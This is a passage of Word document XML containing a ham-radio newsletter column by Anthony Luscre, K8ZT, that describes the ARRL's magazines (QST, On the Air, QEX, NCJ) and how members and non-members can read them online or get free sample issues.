                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:srcRect l="8075" r="8930"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3057660" cy="2271713"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DBD14" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anthony Luscre, K8ZT - SYC</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB590C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="0084211F" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78">
        <w:r w:rsidR="00A46D96" w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">k8zt@arrl.net </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3323DE5A" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0215F6FE" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ARRL Magazine Publications- Are You Getting The Full Story? &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB12F04" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>A Year-End Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B655D88" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC21A47" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRL Magazine (Journal) Publications </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7376D09C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="302DE111" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">As ARRL members, most of us are aware of the monthly publication </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>QST,</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> which arrives via the mail each month. But are you aware that this is not the only magazine/journal that the ARRL publishes? The ARRL publishes the following:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="930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225"/>
        <w:gridCol w:w="6075"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A46D96" w:rsidRPr="002B5593" w14:paraId="7BFBD557" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B200E55" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0CF2020C" wp14:editId="3B454A65">
                  <wp:extent cx="1728788" cy="823716"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="image5.png" descr="A picture containing text, clipart&#10;&#10;Description automatically generated"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="4" name="image5.png" descr="A picture containing text, clipart&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1728788" cy="823716"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47D2C5D2" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:t>QST is the monthly membership journal of ARRL. Each issue is your source for equipment reviews, technical tips, projects, and news.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A46D96" w:rsidRPr="002B5593" w14:paraId="6CE98DAD" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07345276" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6C43DBD5" wp14:editId="02555DBD">
                  <wp:extent cx="1914525" cy="1123950"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12" name="image2.png" descr="Logo, company name&#10;&#10;Description automatically generated"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="12" name="image2.png" descr="Logo, company name&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId80"/>
                          <a:srcRect t="19900" b="21393"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1914525" cy="1123950"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D4C230C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:t>On the Air is a suite of ARRL benefits for new ham radio licensees, anchored by the ARRL bimonthly magazine. Covers a range of ham radio interests and topics, delivering introductory techniques and stories to help anyone with a beginner-to-intermediate-level of experience. It is an alternative monthly membership journal of ARRL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A46D96" w:rsidRPr="002B5593" w14:paraId="2F034C71" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56ED0BAD" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1FF9C9BE" wp14:editId="4CBD4CB3">
                  <wp:extent cx="1289381" cy="919163"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11" name="image4.png" descr="Text&#10;&#10;Description automatically generated"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="11" name="image4.png" descr="Text&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId81"/>
                          <a:srcRect b="28712"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1289381" cy="919163"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EE5BFFE" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:t>Companion to On the Air Podcast. The podcast takes a deeper dive into select features and projects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A46D96" w:rsidRPr="002B5593" w14:paraId="22B49358" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C98445F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1534553C" wp14:editId="13B688FC">
                  <wp:extent cx="1736196" cy="919163"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="66" name="image3.png" descr="A picture containing text, yellow, painted, bright&#10;&#10;Description automatically generated"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="66" name="image3.png" descr="A picture containing text, yellow, painted, bright&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId82"/>
                          <a:srcRect t="9734" b="10619"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1736196" cy="919163"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6883C8A0" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:t>QEX is published bimonthly, it features technical articles, columns, and other items of interest to radio amateurs and communications professionals.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A46D96" w:rsidRPr="002B5593" w14:paraId="4A235EB0" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04855C0E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5CB1E923" wp14:editId="3049C965">
                  <wp:extent cx="1703004" cy="871538"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6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83"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1703004" cy="871538"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="72" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="72" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B294AB3" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00F7328A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002B5593">
              <w:t>The NCJ, published bimonthly, features articles by top contesters, letters, hints, statistics, scores, NA Sprint and QSO Parties. Whether you're a big gun or small, NCJ provides a valuable source of information on the active world of competitive radio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49F45F7A" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="3EFFA77C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When you subscribe, you have the choice of either receiving the paper copy of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>QST</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>On The Air</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> each month as a basic membership benefit. The good news is that for now extra cost, you can read the three remaining publications online for free as a member. Here is the link to the ARRL Magazines page where you can access all of them- </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/arrl-magazines</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">. There is also a written guide to the magazines available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t xml:space="preserve">www.arrl.org/files/file/QST/PageSuite/UserGuide.pdf.  </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>If you would prefer a print version, you can also subscribe, for an additional cost, to any of the publications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9038E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252991488" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="19BFEDD4" wp14:editId="73139217">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3459746</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3617329" cy="3290888"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="68" name="image8.png" descr="Graphical user interface,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68" name="image8.png" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3617329" cy="3290888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9A51AC" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Free Sample Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C33B0" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="4997B89C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">If you are not currently a member of the ARRL (you really should consider joining), you can receive a free printed copy of all four publications by visiting- </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/ota-sample</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">. Check all four boxes to get a sample of each publication. To view a sample online version of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>QST,</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> you can also visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/digital-qst-sample-form</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92120F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
